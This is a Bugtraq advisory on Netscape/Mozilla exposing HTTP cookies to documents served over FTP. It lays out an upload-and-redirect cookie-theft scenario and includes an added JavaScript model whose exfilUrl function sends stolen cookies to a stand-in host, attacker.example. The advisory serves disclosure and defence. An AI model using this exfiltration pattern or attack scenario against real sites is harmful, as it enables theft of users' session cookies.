Hello bugtraq,
The article below describes a vulnerability that can be treated
either as a software vulnerability or as a server configuration
problem, depending on your point of view. Either way, many
servers on the Internet are affected by it.
Topic: accessing cookies via ftp
Affected Software: all versions of Netscape/Mozilla
Author: 3APA3A <[email protected]>
Risk: Low
Remotely Exploitable: Yes
Impact: depending on server configuration, a cookie set by a server can be retrieved from the client by a hostile party
Vendor URL: http://www.mozilla.org
SECURITY.NNOV advisories: http://www.security.nnov.ru/advisories
Description:
Mozilla does not record the protocol over which a cookie was
received, and it lets documents fetched via FTP read cookies. A
document located on an FTP site can therefore read any cookie set
by an HTTP site with the same host name (or any cookie whose
Domain attribute covers the FTP host). FTP has no equivalent of
the HTTP Host header, so an FTP server cannot distinguish
name-based virtual hosts: every name that resolves to the host
reaches the same FTP directory tree. Combined with FTP sites that
allow anonymous upload, this creates a risk of unauthorized access
to cookies. Cookies marked Secure (set over HTTPS) are probably
not affected, since the browser only sends them over a secure
connection. Internet Explorer is probably not affected.
Details:
The attack is possible under the following conditions,
illustrated by an example scenario:
http://webmail.example.com uses a cookie to store the user's
account information. There is also ftp://ftp.example.com with an
/incoming directory that allows anonymous upload, physically
located on the same host, 192.168.1.1. Because the FTP server
cannot distinguish virtual hosts, ftp://webmail.example.com/incoming
reaches the same directory and can be written to anonymously.
(The attack is also possible if webmail.example.com and
ftp.example.com are on different hosts but webmail.example.com
sets its cookie for the example.com domain, as many servers do;
the browser then sends that cookie to ftp.example.com as well.)
1. The attacker prepares a document, malware.html, that sends the
cookie of the user who opens it to a URL of the attacker's
choosing.
2. He uploads this document to
ftp://ftp.example.com/incoming
3. He sends an e-mail to a webmail.example.com user that redirects
to ftp://webmail.example.com/incoming/malware.html (for example
with a <META REFRESH> tag).
4. When the user opens the message he is redirected to
malware.html, which sends the user's cookie to the URL specified
by the attacker.
If there is no anonymous access to the FTP server but the attacker
has an FTP account, he can use a URL of the form
ftp://account:password@webmail.example.com/incoming/malware.html
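To make the matching concrete, here is an added example (not code from the advisory, nor from Mozilla) that models the cookie-visibility decision a Netscape-era browser makes for a document URL, both under the scheme-blind policy the advisory describes and under a hypothetical scheme-aware policy, and builds the collector URL that malware.html would request. The cookie names, the sample cookie jar and the attacker's collector URL are assumptions for illustration.

```javascript
"use strict";

// A cookie as the browser stored it after a Set-Cookie response.
// Note that nothing records the scheme it arrived over; only Secure is kept.
function makeCookie({ name, value, domain, path = "/", secure = false }) {
  return { name, value, domain: domain.toLowerCase(), path, secure };
}

// Netscape cookie-spec domain match: a host-only cookie matches the exact
// host; a Domain=.example.com cookie matches any host ending in ".example.com".
function domainMatches(cookieDomain, host) {
  host = host.toLowerCase();
  if (cookieDomain.startsWith(".")) {
    return host === cookieDomain.slice(1) || host.endsWith(cookieDomain);
  }
  return host === cookieDomain;
}

// Path match: the request path must begin with the cookie's Path.
function pathMatches(cookiePath, path) {
  return path.startsWith(cookiePath);
}

// Cookies a document at `url` can read, under two policies:
//   schemeAware = false : the behaviour the advisory describes; the scheme is
//                         ignored except that Secure cookies need https.
//   schemeAware = true  : hypothetical hardening; cookies are only exposed to
//                         http/https documents, so an ftp:// document gets none.
function cookiesVisibleTo(jar, url, { schemeAware = false } = {}) {
  const u = new URL(url);
  const isHttps = u.protocol === "https:";
  const isHttpFamily = u.protocol === "http:" || isHttps;
  return jar.filter((c) =>
    domainMatches(c.domain, u.hostname) &&
    pathMatches(c.path, u.pathname) &&
    (!c.secure || isHttps) &&
    (!schemeAware || isHttpFamily)
  );
}

// What document.cookie would return for that document.
function documentCookieString(jar, url, opts) {
  return cookiesVisibleTo(jar, url, opts)
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// The payload side of malware.html: the stolen string is shipped to an
// attacker-chosen URL, e.g. as the src of an <img>. Collector is an assumption.
function exfilUrl(cookieString, collector = "http://attacker.example/collect") {
  return `${collector}?c=${encodeURIComponent(cookieString)}`;
}

// Constructed sample jar: webmail sets a host-scoped session cookie over plain
// HTTP, a domain-wide cookie (as "many servers do"), and a Secure cookie.
const JAR = [
  makeCookie({ name: "WMSESSID", value: "abc123", domain: "webmail.example.com" }),
  makeCookie({ name: "user", value: "alice", domain: ".example.com" }),
  makeCookie({ name: "auth", value: "s3cr3t", domain: "webmail.example.com", secure: true }),
];

// Run the scenario from the advisory: malware.html fetched via the web host's
// own name, via the separate ftp host, and via the web host under the
// hypothetical scheme-aware policy.
function demo() {
  const viaSameHost = "ftp://webmail.example.com/incoming/malware.html";
  const viaOtherHost = "ftp://ftp.example.com/incoming/malware.html";
  return {
    sameHostFlawed: documentCookieString(JAR, viaSameHost),
    otherHostFlawed: documentCookieString(JAR, viaOtherHost),
    sameHostFixed: documentCookieString(JAR, viaSameHost, { schemeAware: true }),
  };
}

const result = demo();
console.log(result);
console.log(exfilUrl(result.sameHostFlawed));
```

Under the scheme-blind policy the ftp:// document on webmail.example.com sees both the host-scoped session cookie and the domain-wide cookie, the document on ftp.example.com still sees the domain-wide one, and only the Secure cookie is withheld; under the scheme-aware policy the ftp:// document sees nothing.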
Additional Information:
See: http://bugzilla.mozilla.org/show_bug.cgi?id=90644
Workaround:
Disable the /incoming (anonymous upload) directory on your FTP
site if your web site, or any site co-located on the same host,
uses cookies that hold private information. Where possible, also
scope cookies to the web server's own host name rather than to the
whole domain, so that a cookie set by webmail.example.com is not
delivered to ftp.example.com, and set the Secure flag on cookies
that are only needed over HTTPS. After the change, confirm with an
anonymous FTP client that no directory on the server accepts
uploads.
--
http://www.security.nnov.ru
         /\_/\
        { . . } |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A  }
+-------------o66o--+ /
                    |/
You know my name - look up my number (The Beatles)